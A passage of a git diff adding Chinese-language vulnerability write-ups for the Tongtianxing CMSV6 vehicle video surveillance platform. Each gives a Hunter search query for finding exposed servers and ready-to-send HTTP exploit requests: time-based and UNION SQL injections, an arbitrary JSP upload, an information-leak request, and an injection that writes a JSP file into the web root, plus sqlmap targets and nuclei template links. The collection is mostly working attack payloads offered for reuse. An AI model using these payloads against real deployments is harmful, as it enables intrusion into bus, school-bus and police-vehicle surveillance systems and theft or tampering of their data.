+通天星CMSV6车载视频监控平台是东莞市通天星软件科技有限公司研发的监控平台，通天星CMSV6产品覆盖车载录像机、单兵录像机、网络监控摄像机、行驶记录仪等产品的视频综合平台。通天星科技应用于公交车车载、校车车载、大巴车车载、物流车载、油品运输车载、警车车载等公共交通视频监控，还应用在家居看护、商铺远程监控、私家车的行驶分享仪上等。通天星CMSV6车载视频监控平台edu_plan/publish_revoke存在SQL注入漏洞，攻击者可以通过构造恶意的SQL语句，成功注入并执行恶意数据库操作，可能导致敏感信息泄露、数据库被篡改或其他严重后果。
+
+# 二、影响版本
++ 通天星CMSV6车载视频监控平台
+
+# 三、资产测绘
++ hunter`web.body="./open/webApi.html"`
++ 特征
+
+![1699407412929-42aaba13-ce63-4d08-95e9-ce71fcab3ab4.png](./img/9E0H1R1a5szPPVSd/1699407412929-42aaba13-ce63-4d08-95e9-ce71fcab3ab4-322983.png)
+
+# 四、漏洞复现
+```java
+GET /edu_plan/publish_revoke;downloadLogger.action?id=(SELECT+5394+FROM+(SELECT(SLEEP(5)))tdpw)--+&value=1  HTTP/1.1
+Host: 
+Pragma: no-cache
+Cache-Control: no-cache
+Upgrade-Insecure-Requests: 1
+User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
+Accept-Encoding: gzip, deflate
+Accept-Language: zh-CN,zh;q=0.9,en;q=0.8
+Cookie: JSESSIONID=58586A7CBD64C381945F9AAACFDF7C40
+Connection: close
+Content-Length: 0
+```
+
+![1712850376800-629599b5-79ae-4705-be10-63f45108cdf7.png](./img/9E0H1R1a5szPPVSd/1712850376800-629599b5-79ae-4705-be10-63f45108cdf7-900919.png)
+
+sqlmap
+
+```java
+/edu_plan/publish_revoke;downloadLogger.action?id=1&value=1
+```
+
+![1712850484377-d0dfc585-b34b-4487-af07-28d3d4d80f8a.png](./img/9E0H1R1a5szPPVSd/1712850484377-d0dfc585-b34b-4487-af07-28d3d4d80f8a-063750.png)
+
+
+
+> 更新: 2024-12-28 13:05:34  
+> 原文: <https://www.yuque.com/xiaokp7/ocvun2/tsz08zvrgv6ne5b7>
\ No newline at end of file
diff --git a/通天星CMSV6车载视频监控平台getAlarmAppealByGuid存在SQL注入漏洞.md b/通天星CMSV6车载视频监控平台getAlarmAppealByGuid存在SQL注入漏洞.md
new file mode 100644
index 0000000..a8dfb9e
--- /dev/null
+++ b/通天星CMSV6车载视频监控平台getAlarmAppealByGuid存在SQL注入漏洞.md
@@ -0,0 +1,51 @@
+# 通天星CMSV6车载视频监控平台 getAlarmAppealByGuid存在SQL注入漏洞
+
+# 一、漏洞简介
+通天星CMSV6车载视频监控平台是东莞市通天星软件科技有限公司研发的监控平台，通天星CMSV6产品覆盖车载录像机、单兵录像机、网络监控摄像机、行驶记录仪等产品的视频综合平台。通天星科技应用于公交车车载、校车车载、大巴车车载、物流车载、油品运输车载、警车车载等公共交通视频监控，还应用在家居看护、商铺远程监控、私家车的行驶分享仪上等。通天星CMSV6车载视频监控平台getAlarmAppealByGuid存在SQL注入漏洞，攻击者可以通过构造恶意的SQL语句，成功注入并执行恶意数据库操作，可能导致敏感信息泄露、数据库被篡改或其他严重后果。
+
+# 二、影响版本
++ 通天星CMSV6车载视频监控平台
+
+# 三、资产测绘
++ hunter`web.body="./open/webApi.html"`
++ 特征
+
+![1699407412929-42aaba13-ce63-4d08-95e9-ce71fcab3ab4.png](./img/lnRXUcYiC0A3P_mY/1699407412929-42aaba13-ce63-4d08-95e9-ce71fcab3ab4-410488.png)
+
+# 四、漏洞复现
+```rust
+POST /alarm_appeal/getAlarmAppealByGuid;downloadLogger.action HTTP/1.1
+Host: 192.168.31.228
+User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/93.0.4577.63 Safari/537.36
+Connection: close
+X-Forwarded-For: 127.0.0.1
+Accept-Encoding: gzip, deflate
+Content-Type: application/x-www-form-urlencoded
+
+guid=1') UNION ALL SELECT NULL,CONCAT(0x7178786a71,0x4878597253544d464658514545495671627943586f73584f5056504164416342614549794a446b45,0x71717a7671),NULL-- -
+```
+
+![1717263406398-da903405-30a5-4b1d-9f7a-d357e304e250.png](./img/lnRXUcYiC0A3P_mY/1717263406398-da903405-30a5-4b1d-9f7a-d357e304e250-477232.png)
+
+```rust
+qxxjqHxYrSTMFFXQEEIVqbyCXosXOPVPAdAcBaEIyJDkEqqzvq
+```
+
+```rust
+POST /alarm_appeal/getAlarmAppealByGuid;downloadLogger.action HTTP/1.1
+Host: 192.168.31.228
+User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/93.0.4577.63 Safari/537.36
+Connection: close
+X-Forwarded-For: 127.0.0.1
+Accept-Encoding: gzip, deflate
+Content-Type: application/x-www-form-urlencoded
+
+guid=1
+```
+
+![1717263425891-e939657e-86f6-492b-baff-4047d8ab502a.png](./img/lnRXUcYiC0A3P_mY/1717263425891-e939657e-86f6-492b-baff-4047d8ab502a-078476.png)
+
+
+
+> 更新: 2024-12-28 13:05:34  
+> 原文: <https://www.yuque.com/xiaokp7/ocvun2/bowy6gf658mit37a>
\ No newline at end of file
diff --git a/通天星CMSV6车载视频监控平台inspect_file存在任意文件上传漏洞.md b/通天星CMSV6车载视频监控平台inspect_file存在任意文件上传漏洞.md
new file mode 100644
index 0000000..ee5f825
--- /dev/null
+++ b/通天星CMSV6车载视频监控平台inspect_file存在任意文件上传漏洞.md
@@ -0,0 +1,49 @@
+# 通天星CMSV6车载视频监控平台 inspect_file存在任意文件上传漏洞
+
+# 一、漏洞简介
+通天星CMSV6车载视频监控平台是东莞市通天星软件科技有限公司研发的监控平台，通天星CMSV6产品覆盖车载录像机、单兵录像机、网络监控摄像机、行驶记录仪等产品的视频综合平台。通天星科技应用于公交车车载、校车车载、大巴车车载、物流车载、油品运输车载、警车车载等公共交通视频监控，还应用在家居看护、商铺远程监控、私家车的行驶分享仪上等。通天星CMSV6车载视频监控平台 inspect_file存在任意文件上传漏洞，攻击者可通过该漏洞获取服务器权限。
+
+# 二、影响版本
++ 通天星CMSV6车载视频监控平台
+
+# 三、资产测绘
++ hunter`web.body="./open/webApi.html"`
++ 特征
+
+![1699407412929-42aaba13-ce63-4d08-95e9-ce71fcab3ab4.png](./img/jUid1OxjXoRrC2t_/1699407412929-42aaba13-ce63-4d08-95e9-ce71fcab3ab4-651656.png)
+
+# 四、漏洞复现
+```plain
+POST /inspect_file/upload HTTP/1.1
+Host: 
+User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/93.0.4577.63 Safari/537.36
+Content-Length: 209
+Accept: text/html, image/gif, image/jpeg, *; q=.2, */*; q=.2
+Connection: close
+Content-Type: multipart/form-data; boundary=00content0boundary00
+Accept-Encoding: gzip, deflate
+
+--00content0boundary00
+Content-Disposition: form-data; name="uploadFile"; filename="1.jsp"
+Content-Type: application/ocet-stream
+
+<% out.println("435352Els1K9wZvOlSsdsdmrg"); %>
+--00content0boundary00--
+```
+
+![1711442433836-11ccee10-a5e8-48da-bc64-14c0946ac2a4.png](./img/jUid1OxjXoRrC2t_/1711442433836-11ccee10-a5e8-48da-bc64-14c0946ac2a4-277023.png)
+
+上传文件位置
+
+```plain
+/upload/software/185859979470834_1.jsp
+```
+
+![1711442455597-99c0ecf1-513c-482a-87cf-dc08827ee05d.png](./img/jUid1OxjXoRrC2t_/1711442455597-99c0ecf1-513c-482a-87cf-dc08827ee05d-597295.png)
+
+[tongtianxing-inspectfile-upload.yaml](https://www.yuque.com/attachments/yuque/0/2024/yaml/29512878/1735362336502-b3be6c93-a873-4f21-ae01-ef858e24e559.yaml)
+
+
+
+> 更新: 2024-12-28 13:05:36  
+> 原文: <https://www.yuque.com/xiaokp7/ocvun2/sr4td7gzb4nxdfpf>
\ No newline at end of file
diff --git a/通天星CMSV6车载视频监控平台kq_schedule存在SQL注入漏洞.md b/通天星CMSV6车载视频监控平台kq_schedule存在SQL注入漏洞.md
new file mode 100644
index 0000000..e35f3a3
--- /dev/null
+++ b/通天星CMSV6车载视频监控平台kq_schedule存在SQL注入漏洞.md
@@ -0,0 +1,41 @@
+# 通天星CMSV6车载视频监控平台 kq_schedule存在SQL注入漏洞
+
+# 一、漏洞简介
+通天星CMSV6车载视频监控平台是东莞市通天星软件科技有限公司研发的监控平台，通天星CMSV6产品覆盖车载录像机、单兵录像机、网络监控摄像机、行驶记录仪等产品的视频综合平台。通天星科技应用于公交车车载、校车车载、大巴车车载、物流车载、油品运输车载、警车车载等公共交通视频监控，还应用在家居看护、商铺远程监控、私家车的行驶分享仪上等。通天星CMSV6车载视频监控平台kq_schedule存在SQL注入漏洞，攻击者可以通过构造恶意的SQL语句，成功注入并执行恶意数据库操作，可能导致敏感信息泄露、数据库被篡改或其他严重后果。
+
+# 二、影响版本
++ 通天星CMSV6车载视频监控平台
+
+# 三、资产测绘
++ hunter`web.body="./open/webApi.html"`
++ 特征
+
+![1699407412929-42aaba13-ce63-4d08-95e9-ce71fcab3ab4.png](./img/OJGsYbfBirSjQZ9t/1699407412929-42aaba13-ce63-4d08-95e9-ce71fcab3ab4-467613.png)
+
+# 四、漏洞复现
+```rust
+GET /kq_schedule/delete;downloadLogger.action?ids=1+AND+%28SELECT+9567+FROM+%28SELECT%28SLEEP%285%29%29%29zPmp%29 HTTP/1.1
+Host: 192.168.31.228
+User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/93.0.4577.63 Safari/537.36
+Connection: close
+X-Forwarded-For: 127.0.0.1
+Accept-Encoding: gzip, deflate
+```
+
+![1717268117442-a6599a3f-e665-4ee0-9364-10de4fcc243d.png](./img/OJGsYbfBirSjQZ9t/1717268117442-a6599a3f-e665-4ee0-9364-10de4fcc243d-156222.png)
+
+```rust
+GET /kq_schedule/delete;downloadLogger.action?ids=1 HTTP/1.1
+Host: 192.168.31.228
+User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/93.0.4577.63 Safari/537.36
+Connection: close
+X-Forwarded-For: 127.0.0.1
+Accept-Encoding: gzip, deflate
+```
+
+![1717268130763-479651e7-aa3d-4114-afad-91b384dd1840.png](./img/OJGsYbfBirSjQZ9t/1717268130763-479651e7-aa3d-4114-afad-91b384dd1840-531987.png)
+
+
+
+> 更新: 2024-12-28 13:05:34  
+> 原文: <https://www.yuque.com/xiaokp7/ocvun2/fmga29xwyqfe0e9h>
\ No newline at end of file
diff --git a/通天星CMSV6车载视频监控平台line_manage存在SQL注入漏洞.md b/通天星CMSV6车载视频监控平台line_manage存在SQL注入漏洞.md
new file mode 100644
index 0000000..02d3609
--- /dev/null
+++ b/通天星CMSV6车载视频监控平台line_manage存在SQL注入漏洞.md
@@ -0,0 +1,41 @@
+# 通天星CMSV6车载视频监控平台 line_manage存在SQL注入漏洞
+
+# 一、漏洞简介
+通天星CMSV6车载视频监控平台是东莞市通天星软件科技有限公司研发的监控平台，通天星CMSV6产品覆盖车载录像机、单兵录像机、网络监控摄像机、行驶记录仪等产品的视频综合平台。通天星科技应用于公交车车载、校车车载、大巴车车载、物流车载、油品运输车载、警车车载等公共交通视频监控，还应用在家居看护、商铺远程监控、私家车的行驶分享仪上等。通天星CMSV6车载视频监控平台line_manage存在SQL注入漏洞，攻击者可以通过构造恶意的SQL语句，成功注入并执行恶意数据库操作，可能导致敏感信息泄露、数据库被篡改或其他严重后果。
+
+# 二、影响版本
++ 通天星CMSV6车载视频监控平台
+
+# 三、资产测绘
++ hunter`web.body="./open/webApi.html"`
++ 特征
+
+![1699407412929-42aaba13-ce63-4d08-95e9-ce71fcab3ab4.png](./img/F4enrv2hHyz0sLln/1699407412929-42aaba13-ce63-4d08-95e9-ce71fcab3ab4-130124.png)
+
+# 四、漏洞复现
+```rust
+GET /line_manage/delete;downloadLogger.action?ids=1+AND+%28SELECT+4476+FROM+%28SELECT%28SLEEP%285%29%29%29ytWS%29 HTTP/1.1
+Host: 
+User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/93.0.4577.63 Safari/537.36
+Connection: close
+X-Forwarded-For: 127.0.0.1
+Accept-Encoding: gzip, deflate
+```
+
+![1717262506770-17a548a5-f207-4114-9195-5660ad1b8153.png](./img/F4enrv2hHyz0sLln/1717262506770-17a548a5-f207-4114-9195-5660ad1b8153-218646.png)
+
+```rust
+GET /line_manage/delete;downloadLogger.action?ids=1 HTTP/1.1
+Host: 192.168.31.228
+User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/93.0.4577.63 Safari/537.36
+Connection: close
+X-Forwarded-For: 127.0.0.1
+Accept-Encoding: gzip, deflate
+```
+
+![1717262527580-86540e20-0078-4842-abdf-59e984bacf4f.png](./img/F4enrv2hHyz0sLln/1717262527580-86540e20-0078-4842-abdf-59e984bacf4f-620776.png)
+
+
+
+> 更新: 2024-12-28 13:05:34  
+> 原文: <https://www.yuque.com/xiaokp7/ocvun2/nwh3iqsrt23310w9>
\ No newline at end of file
diff --git a/通天星CMSV6车载视频监控平台list存在SQL注入漏洞.md b/通天星CMSV6车载视频监控平台list存在SQL注入漏洞.md
new file mode 100644
index 0000000..72c7a89
--- /dev/null
+++ b/通天星CMSV6车载视频监控平台list存在SQL注入漏洞.md
@@ -0,0 +1,49 @@
+# 通天星CMSV6车载视频监控平台 list存在SQL注入漏洞
+
+# 一、漏洞简介
+通天星CMSV6车载视频监控平台是东莞市通天星软件科技有限公司研发的监控平台，通天星CMSV6产品覆盖车载录像机、单兵录像机、网络监控摄像机、行驶记录仪等产品的视频综合平台。通天星科技应用于公交车车载、校车车载、大巴车车载、物流车载、油品运输车载、警车车载等公共交通视频监控，还应用在家居看护、商铺远程监控、私家车的行驶分享仪上等。通天星CMSV6车载视频监控平台list存在SQL注入漏洞，攻击者可以通过构造恶意的SQL语句，成功注入并执行恶意数据库操作，可能导致敏感信息泄露、数据库被篡改或其他严重后果。
+
+# 二、影响版本
++ 通天星CMSV6车载视频监控平台
+
+# 三、资产测绘
++ hunter`web.body="./open/webApi.html"`
++ 特征
+
+![1699407412929-42aaba13-ce63-4d08-95e9-ce71fcab3ab4.png](./img/tmu3Xxcc1F3mcmjk/1699407412929-42aaba13-ce63-4d08-95e9-ce71fcab3ab4-245533.png)
+
+# 四、漏洞复现
+```rust
+POST /dynamic_monitoring_ledger/list;downloadLogger.action HTTP/1.1
+Host: 192.168.31.228
+User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/93.0.4577.63 Safari/537.36
+Connection: close
+X-Forwarded-For: 127.0.0.1
+Accept-Encoding: gzip, deflate
+Content-Type: application/x-www-form-urlencoded
+Content-Length: 5
+
+statisticTime=1%27+AND+%28SELECT+8849+FROM+%28SELECT%28SLEEP%285%29%29%29uSno%29+AND+%27OOJG%27%3D%27OOJG&companyId=1
+```
+
+![1717267151736-c56bcaa3-cb69-441e-8b04-e805212faca0.png](./img/tmu3Xxcc1F3mcmjk/1717267151736-c56bcaa3-cb69-441e-8b04-e805212faca0-757112.png)
+
+```rust
+POST /dynamic_monitoring_ledger/list;downloadLogger.action HTTP/1.1
+Host: 192.168.31.228
+User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/93.0.4577.63 Safari/537.36
+Connection: close
+X-Forwarded-For: 127.0.0.1
+Accept-Encoding: gzip, deflate
+Content-Type: application/x-www-form-urlencoded
+Content-Length: 5
+
+statisticTime=1&companyId=1
+```
+
+![1717267165188-7b3988d6-74f8-4a05-be91-13a7164216c7.png](./img/tmu3Xxcc1F3mcmjk/1717267165188-7b3988d6-74f8-4a05-be91-13a7164216c7-396815.png)
+
+
+
+> 更新: 2024-12-28 13:05:34  
+> 原文: <https://www.yuque.com/xiaokp7/ocvun2/ws5p2n55yd0od163>
\ No newline at end of file
diff --git a/通天星CMSV6车载视频监控平台list存在信息泄露漏洞.md b/通天星CMSV6车载视频监控平台list存在信息泄露漏洞.md
new file mode 100644
index 0000000..ad9c952
--- /dev/null
+++ b/通天星CMSV6车载视频监控平台list存在信息泄露漏洞.md
@@ -0,0 +1,41 @@
+# 通天星CMSV6车载视频监控平台 list存在信息泄露漏洞
+
+# 一、漏洞简介
+通天星CMSV6车载视频监控平台是东莞市通天星软件科技有限公司研发的监控平台，通天星CMSV6产品覆盖车载录像机、单兵录像机、网络监控摄像机、行驶记录仪等产品的视频综合平台。通天星科技应用于公交车车载、校车车载、大巴车车载、物流车载、油品运输车载、警车车载等公共交通视频监控，还应用在家居看护、商铺远程监控、私家车的行驶分享仪上等。通天星CMSV6车载视频监控平台list存在信息泄露漏洞.
+
+# 二、影响版本
++ 通天星CMSV6车载视频监控平台
+
+# 三、资产测绘
++ hunter`web.body="./open/webApi.html"`
++ 特征
+
+![1699407412929-42aaba13-ce63-4d08-95e9-ce71fcab3ab4.png](./img/IV8qZP8iGWlBN37Q/1699407412929-42aaba13-ce63-4d08-95e9-ce71fcab3ab4-245697.png)
+
+# 四、漏洞复现
+```plain
+POST /xz_center/list HTTP/1.1
+Host: {hostname}
+User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:121.0) Gecko/20100101 Firefox/121.0
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
+Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
+Accept-Encoding: gzip, deflate
+Connection: close
+Cookie: JSESSIONID=07B1AA29791CD9F46FCEFA01A13C216B
+Upgrade-Insecure-Requests: 1
+Content-Type: application/x-www-form-urlencoded
+Content-Length: 6
+
+page=1
+```
+
+![1703432021521-6d6a9adc-749b-4056-964d-5278a0aa0ce5.png](./img/IV8qZP8iGWlBN37Q/1703432021521-6d6a9adc-749b-4056-964d-5278a0aa0ce5-588079.png)
+
+nuclei脚本
+
+[通天星-CMSV6-list-信息泄露.yaml](https://www.yuque.com/attachments/yuque/0/2024/yaml/29512878/1735362335694-f59d95ab-6b75-4975-a77a-c3ffb8b4a7b0.yaml)
+
+
+
+> 更新: 2024-12-28 13:05:35  
+> 原文: <https://www.yuque.com/xiaokp7/ocvun2/cld4q2px8ng4gqhe>
\ No newline at end of file
diff --git a/通天星CMSV6车载视频监控平台merge存在SQL注入漏洞.md b/通天星CMSV6车载视频监控平台merge存在SQL注入漏洞.md
new file mode 100644
index 0000000..341bb5f
--- /dev/null
+++ b/通天星CMSV6车载视频监控平台merge存在SQL注入漏洞.md
@@ -0,0 +1,39 @@
+# 通天星CMSV6车载视频监控平台 merge存在SQL注入漏洞
+
+# 一、漏洞简介
+通天星CMSV6车载视频监控平台是东莞市通天星软件科技有限公司研发的监控平台，通天星CMSV6产品覆盖车载录像机、单兵录像机、网络监控摄像机、行驶记录仪等产品的视频综合平台。通天星科技应用于公交车车载、校车车载、大巴车车载、物流车载、油品运输车载、警车车载等公共交通视频监控，还应用在家居看护、商铺远程监控、私家车的行驶分享仪上等。通天星CMSV6车载视频监控平台merge存在SQL注入漏洞，攻击者可以通过构造恶意的SQL语句，成功注入并执行恶意数据库操作，可能导致敏感信息泄露、数据库被篡改或其他严重后果。
+
+# 二、影响版本
++ 通天星CMSV6车载视频监控平台
+
+# 三、资产测绘
++ hunter`web.body="./open/webApi.html"`
++ 特征
+
+![1699407412929-42aaba13-ce63-4d08-95e9-ce71fcab3ab4.png](./img/Afrkn5c6A6CUIImS/1699407412929-42aaba13-ce63-4d08-95e9-ce71fcab3ab4-135980.png)
+
+# 四、漏洞复现
+```plain
+POST /point_manage/merge HTTP/1.1
+Host: 
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36
+Content-Type: application/x-www-form-urlencoded
+Content-Length: 
+
+id=1&name=9' UNION SELECT%0aNULL, 0x3c25206f75742e7072696e74282248656c6c6f20576f726c642122293b206e6577206a6176612e696f2e46696c65286170706c69636174696f6e2e6765745265616c5061746828726571756573742e676574536572766c657450617468282929292e64656c65746528293b20253e,NULL,NULL,NULL,NULL,NULL,NULL
+INTO dumpfile '../../tomcat/webapps/gpsweb/testqwe.jsp' FROM user_session a
+WHERE '9 '='9 &type=3&map_id=4&install_place=5&check_item=6&create_time=7&update_time=8
+```
+
+![1719308744478-3dcb8622-37c6-4df6-b680-6efbdd362858.png](./img/Afrkn5c6A6CUIImS/1719308744478-3dcb8622-37c6-4df6-b680-6efbdd362858-321423.png)
+
+```plain
+/testqwe.jsp
+```
+
+![1719308766874-83e8ee62-5756-4956-a24c-8785c401dcba.png](./img/Afrkn5c6A6CUIImS/1719308766874-83e8ee62-5756-4956-a24c-8785c401dcba-983012.png)
+
+
+
+> 更新: 2024-12-28 13:05:35  
+> 原文: <https://www.yuque.com/xiaokp7/ocvun2/lbwmh459c1s3w59c>
\ No newline at end of file
diff --git a/通天星CMSV6车载视频监控平台muck_vehi_certificate存在SQL注入漏洞.md b/通天星CMSV6车载视频监控平台muck_vehi_certificate存在SQL注入漏洞.md
new file mode 100644
index 0000000..73e73f1
--- /dev/null
+++ b/通天星CMSV6车载视频监控平台muck_vehi_certificate存在SQL注入漏洞.md
@@ -0,0 +1,41 @@
+# 通天星CMSV6车载视频监控平台 muck_vehi_certificate存在SQL注入漏洞
+
+# 一、漏洞简介
+通天星CMSV6车载视频监控平台是东莞市通天星软件科技有限公司研发的监控平台，通天星CMSV6产品覆盖车载录像机、单兵录像机、网络监控摄像机、行驶记录仪等产品的视频综合平台。通天星科技应用于公交车车载、校车车载、大巴车车载、物流车载、油品运输车载、警车车载等公共交通视频监控，还应用在家居看护、商铺远程监控、私家车的行驶分享仪上等。通天星CMSV6车载视频监控平台muck_vehi_certificate存在SQL注入漏洞，攻击者可以通过构造恶意的SQL语句，成功注入并执行恶意数据库操作，可能导致敏感信息泄露、数据库被篡改或其他严重后果。
+
+# 二、影响版本
++ 通天星CMSV6车载视频监控平台
+
+# 三、资产测绘
++ hunter`web.body="./open/webApi.html"`
++ 特征
+
+![1699407412929-42aaba13-ce63-4d08-95e9-ce71fcab3ab4.png](./img/AThSrn99nkgiA3Y4/1699407412929-42aaba13-ce63-4d08-95e9-ce71fcab3ab4-994540.png)
+
+# 四、漏洞复现
+```rust
+GET /muck_vehi_certificate/delete;downloadLogger.action?ids=1+AND+%28SELECT+2688+FROM+%28SELECT%28SLEEP%285%29%29%29kOIi%29 HTTP/1.1
+Host: 192.168.31.228
+User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/93.0.4577.63 Safari/537.36
+Connection: close
+X-Forwarded-For: 127.0.0.1
+Accept-Encoding: gzip, deflate
+```
+
+![1717266956493-8a4748d9-9bb9-499e-a7da-7fb88f1bc75f.png](./img/AThSrn99nkgiA3Y4/1717266956493-8a4748d9-9bb9-499e-a7da-7fb88f1bc75f-451592.png)
+
+```rust
+GET /muck_vehi_certificate/delete;downloadLogger.action?ids=1 HTTP/1.1
+Host: 192.168.31.228
+User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/93.0.4577.63 Safari/537.36
+Connection: close
+X-Forwarded-For: 127.0.0.1
+Accept-Encoding: gzip, deflate
+```
+
+![1717266974188-6ec35cdb-4b33-457b-8191-8a4af2d9c1a4.png](./img/AThSrn99nkgiA3Y4/1717266974188-6ec35cdb-4b33-457b-8191-8a4af2d9c1a4-848409.png)
+
+
+
+> 更新: 2024-12-28 13:05:33  
+> 原文: <https://www.yuque.com/xiaokp7/ocvun2/qzw4gmu01hbpgfik>
\ No newline at end of file
diff --git a/通天星CMSV6车载视频监控平台run_stop_delete存在SQL注入漏洞.md b/通天星CMSV6车载视频监控平台run_stop_delete存在SQL注入漏洞.md
new file mode 100644
index 0000000..1721890
--- /dev/null
+++ b/通天星CMSV6车载视频监控平台run_stop_delete存在SQL注入漏洞.md
@@ -0,0 +1,41 @@
+# 通天星CMSV6车载视频监控平台 run_stop/delete存在SQL注入漏洞
+
+# 一、漏洞简介
+通天星CMSV6车载视频监控平台是东莞市通天星软件科技有限公司研发的监控平台，通天星CMSV6产品覆盖车载录像机、单兵录像机、网络监控摄像机、行驶记录仪等产品的视频综合平台。通天星科技应用于公交车车载、校车车载、大巴车车载、物流车载、油品运输车载、警车车载等公共交通视频监控，还应用在家居看护、商铺远程监控、私家车的行驶分享仪上等。通天星CMSV6车载视频监控平台run_stop/delete存在SQL注入漏洞，攻击者可以通过构造恶意的SQL语句，成功注入并执行恶意数据库操作，可能导致敏感信息泄露、数据库被篡改或其他严重后果。
+
+# 二、影响版本
++ 通天星CMSV6车载视频监控平台
+
+# 三、资产测绘
++ hunter`web.body="./open/webApi.html"`
++ 特征
+
+![1699407412929-42aaba13-ce63-4d08-95e9-ce71fcab3ab4.png](./img/GsVEgLsQEOTVpq0J/1699407412929-42aaba13-ce63-4d08-95e9-ce71fcab3ab4-051769.png)
+
+# 四、漏洞复现
+```plain
+GET /run_stop/delete.do;downloadLogger.action?ids=1+AND+%28SELECT+4195+FROM+%28SELECT%28SLEEP%283%29%29%29BDMG%29 HTTP/1.1
+Host: 
+User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:124.0) Gecko/20100101 Firefox/124.0
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
+Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
+Accept-Encoding: gzip, deflate
+Connection: close
+Cookie: JSESSIONID=6D759FDA5ECC223DF29DFE45859F13DC
+Upgrade-Insecure-Requests: 1
+```
+
+![1711706599578-2ac6a406-86bb-4b63-9b20-75c9f88b3331.png](./img/GsVEgLsQEOTVpq0J/1711706599578-2ac6a406-86bb-4b63-9b20-75c9f88b3331-964758.png)
+
+sqlmap
+
+```plain
+/run_stop/delete.do;downloadLogger.action?ids=1
+```
+
+![1711706619835-8f722db4-84ac-4323-93ff-d2c308201ca6.png](./img/GsVEgLsQEOTVpq0J/1711706619835-8f722db4-84ac-4323-93ff-d2c308201ca6-175576.png)
+
+
+
+> 更新: 2024-12-28 13:05:35  
+> 原文: <https://www.yuque.com/xiaokp7/ocvun2/qws2rrcs8vegdmm8>
\ No newline at end of file
diff --git a/通天星CMSV6车载视频监控平台task_record_detail_delete存在SQL注入漏洞.md b/通天星CMSV6车载视频监控平台task_record_detail_delete存在SQL注入漏洞.md
new file mode 100644
index 0000000..88781ea
--- /dev/null
+++ b/通天星CMSV6车载视频监控平台task_record_detail_delete存在SQL注入漏洞.md
@@ -0,0 +1,44 @@
+# 通天星CMSV6车载视频监控平台 task_record_detail/delete存在SQL注入漏洞
+
+# 一、漏洞简介
+通天星CMSV6车载视频监控平台是东莞市通天星软件科技有限公司研发的监控平台，通天星CMSV6产品覆盖车载录像机、单兵录像机、网络监控摄像机、行驶记录仪等产品的视频综合平台。通天星科技应用于公交车车载、校车车载、大巴车车载、物流车载、油品运输车载、警车车载等公共交通视频监控，还应用在家居看护、商铺远程监控、私家车的行驶分享仪上等。通天星CMSV6车载视频监控平台task_record_detail/delete存在SQL注入漏洞，攻击者可以通过构造恶意的SQL语句，成功注入并执行恶意数据库操作，可能导致敏感信息泄露、数据库被篡改或其他严重后果。
+
+# 二、影响版本
++ 通天星CMSV6车载视频监控平台
+
+# 三、资产测绘
++ hunter`web.body="./open/webApi.html"`
++ 特征
+
+![1699407412929-42aaba13-ce63-4d08-95e9-ce71fcab3ab4.png](./img/lOUel4FBxVvzVwmN/1699407412929-42aaba13-ce63-4d08-95e9-ce71fcab3ab4-677661.png)
+
+# 四、漏洞复现
+```java
+GET /task_record_detail/delete;downloadLogger.action?ids=1)+AND+(SELECT+5394+FROM+(SELECT(SLEEP(5)))tdpw)--+  HTTP/1.1
+Host: 
+Pragma: no-cache
+Cache-Control: no-cache
+Upgrade-Insecure-Requests: 1
+User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
+Accept-Encoding: gzip, deflate
+Accept-Language: zh-CN,zh;q=0.9,en;q=0.8
+Cookie: JSESSIONID=58586A7CBD64C381945F9AAACFDF7C40
+Connection: close
+Content-Length: 0
+```
+
+![1712850651277-f7c97be6-37ce-4294-a3de-578d5aa2ea1d.png](./img/lOUel4FBxVvzVwmN/1712850651277-f7c97be6-37ce-4294-a3de-578d5aa2ea1d-177606.png)
+
+sqlmap
+
+```java
+/task_record_detail/delete;downloadLogger.action?ids=1)
+```
+
